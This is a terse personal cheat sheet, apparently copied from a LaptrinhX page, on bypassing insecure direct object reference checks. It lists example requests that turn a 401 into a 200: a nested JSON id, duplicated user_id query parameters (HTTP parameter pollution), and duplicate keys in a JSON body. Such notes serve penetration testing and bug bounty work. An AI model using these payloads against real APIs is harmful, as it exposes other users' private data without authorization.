IDOR

Insecure Direct Object Reference (IDOR) | LaptrinhX

Trick

{“id”:111} --> 401 Unauthriozied

{“id”:{“id”:111}} --> 200 OK

Using http parameter pollution

GET /api_v1/messages?user_id=VICTIM_ID --> 401

GET /api_v1/messages?user_id=attack&user_id=VICTIM --> 200

in json code

POST /api/get_profile

Content-Type: application/json {“user_id”:<attacker_id>,”user_id”:<victim’s_id>}

idk